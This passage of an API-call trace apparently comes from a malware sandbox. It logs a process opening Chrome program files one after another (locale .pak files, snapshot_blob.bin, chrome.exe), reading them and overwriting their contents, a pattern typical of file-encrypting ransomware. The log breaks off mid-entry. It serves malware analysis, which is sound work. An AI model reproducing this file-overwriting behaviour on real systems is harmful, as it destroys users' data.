1 [0118.361] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.361] WriteFile (in: hFile=0x1fc, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.361] CloseHandle (hObject=0x1fc) returned 1 [0118.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.362] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.362] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x8f814 [0118.362] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.362] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.362] ReleaseMutex (hMutex=0x168) returned 1 [0118.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="el.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="el.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="el.pak", lpUsedDefaultChar=0x0) returned 6 [0118.363] ReadFile (in: hFile=0x1fc, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.373] ReadFile (in: hFile=0x1fc, lpBuffer=0x289e978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.404] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8e814 [0118.404] ReadFile (in: hFile=0x1fc, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.409] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8e814 [0118.410] WriteFile (in: hFile=0x1fc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.410] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.410] WriteFile (in: hFile=0x1fc, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.411] WriteFile (in: hFile=0x1fc, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.411] CloseHandle (hObject=0x1fc) returned 1 [0118.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.412] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.412] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x51c09 [0118.412] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.412] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.412] ReleaseMutex (hMutex=0x168) returned 1 [0118.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fil.pak", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0118.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fil.pak", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fil.pak", lpUsedDefaultChar=0x0) returned 7 [0118.413] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.425] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x50c09 [0118.425] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.432] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x50c09 [0118.432] WriteFile (in: hFile=0x1fc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.433] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.434] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.434] CloseHandle (hObject=0x1fc) returned 1 [0118.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4e532 [0118.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.435] ReleaseMutex (hMutex=0x168) returned 1 [0118.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="it.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="it.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="it.pak", lpUsedDefaultChar=0x0) returned 6 [0118.435] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.459] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4d532 [0118.459] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.519] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4d532 [0118.553] WriteFile (in: hFile=0x1fc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.553] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.553] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.554] CloseHandle (hObject=0x1fc) returned 1 [0118.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.555] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.555] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3e2ed [0118.555] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.555] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.556] ReleaseMutex (hMutex=0x168) returned 1 [0118.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ms.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ms.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ms.pak", lpUsedDefaultChar=0x0) returned 6 [0118.556] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.972] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3d2ed [0118.973] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.973] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3d2ed [0118.974] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.974] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.974] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.974] CloseHandle (hObject=0x1fc) returned 1 [0118.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.976] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.976] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x5402d [0118.976] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.976] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.976] ReleaseMutex (hMutex=0x168) returned 1 [0118.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sk.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sk.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sk.pak", lpUsedDefaultChar=0x0) returned 6 [0118.976] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.978] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5302d [0118.978] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.981] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5302d [0118.981] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.981] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.982] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.982] CloseHandle (hObject=0x1fc) returned 1 [0118.982] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4f508 [0118.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.983] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.983] ReleaseMutex (hMutex=0x168) returned 1 [0118.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tr.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tr.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tr.pak", lpUsedDefaultChar=0x0) returned 6 [0118.983] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.986] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4e508 [0118.986] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.988] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4e508 [0118.989] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.989] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.989] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.990] CloseHandle (hObject=0x1fc) returned 1 [0118.992] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.995] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.995] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x161db8 [0118.995] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.995] ReleaseMutex (hMutex=0x168) returned 1 [0118.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snapshot_blob.bin", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snapshot_blob.bin", cchWideChar=17, lpMultiByteStr=0x1f88d34, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="snapshot_blob.bin", lpUsedDefaultChar=0x0) returned 17 [0118.995] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0119.226] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.239] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x160db8 [0119.239] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.242] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x160db8 [0119.243] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.244] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0119.244] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0119.245] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0119.245] CloseHandle (hObject=0x1fc) returned 1 [0119.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0119.246] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0119.247] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x117358 [0119.247] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, 